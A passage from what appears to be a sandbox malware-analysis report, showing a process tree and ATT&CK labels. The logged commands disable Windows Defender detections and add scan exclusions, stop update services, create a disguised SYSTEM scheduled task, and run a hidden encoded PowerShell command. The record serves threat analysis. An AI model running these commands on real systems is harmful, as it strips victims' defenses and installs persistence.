Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7792
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4352
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CFpkaqpKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CFpkaqpKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JEWhIfuTYgkU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JEWhIfuTYgkU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KbRDtYdCtulTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KbRDtYdCtulTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dEwGplvbmpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dEwGplvbmpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hUYINVwWaxurQSWawJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hUYINVwWaxurQSWawJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jXXPzgKEWESRXJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jXXPzgKEWESRXJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\zGTXbDaaZIyYrGBFn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\zGTXbDaaZIyYrGBFn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nOPXAzzcmNynnFZF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nOPXAzzcmNynnFZF\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:7556

C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\Dfvcjzo.exe
C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\Dfvcjzo.exe pg /TFsite_idvHB 385118 /S
1⤵
PID:7152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5056 -ip 5056
1⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6580

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:6840
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5296
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:7464
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:9092
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:848
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:8652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6712 -ip 6712
1⤵
PID:2656

C:\Windows\SYSTEM32\cmd.exe
cmd /c hing.bat
1⤵
PID:5660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2TPq55
  2⤵
  PID:7264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb483b46f8,0x7ffb483b4708,0x7ffb483b4718
    3⤵
    PID:8792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,3651239512815300225,1005205594575264052,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
    3⤵
    PID:8588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,3651239512815300225,1005205594575264052,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
    3⤵
    PID:8140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7548 -ip 7548
1⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281633131\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281633131\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x284,0x288,0x28c,0x264,0x290,0xc91588,0xc91598,0xc915a4
1⤵
PID:8112

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7776
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7604
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:9132
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8856
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8620
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:7660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:1396

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:7504
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:9116
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:8500
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:8536
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4520 -ip 4520
1⤵
PID:7832

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:5912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1068

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\tlxvacrdjkek.xml"
1⤵
- Creates scheduled task(s)
PID:8296

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8280
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5104
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:7176
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:8596
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:9156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 208 -ip 208
1⤵
PID:8484

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:2820

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:9188

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8272

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:8464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 8572 -ip 8572
1⤵
PID:8812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 208 -ip 208
1⤵
PID:8876

C:\Windows\SYSTEM32\cmd.exe
cmd /c difficspec.bat
1⤵
PID:5936

C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
1⤵
PID:5976

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
1⤵
PID:9124

C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
1⤵
- Gathers network information
PID:8268
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Desktop\a\owenzx.exe"
  2⤵
  PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 208 -ip 208
1⤵
PID:7020

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:5704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5756

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
1⤵
PID:2012

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:2820
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7712
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8508
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8236
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5528
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:2528

C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
1⤵
- Gathers network information
PID:4972
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Desktop\a\pablozx.exe"
  2⤵
  PID:8848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 208 -ip 208
1⤵
PID:8652

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\tlxvacrdjkek.xml"
1⤵
- Creates scheduled task(s)
PID:2852

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:7868
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:6728
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:7472
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4020
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7196 -ip 7196
1⤵
PID:8688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 208 -ip 208
1⤵
PID:8052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7396 -ip 7396
1⤵
PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 208 -ip 208
1⤵
PID:6652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7784 -ip 7784
1⤵
PID:7096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4808 -ip 4808
1⤵
PID:8708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

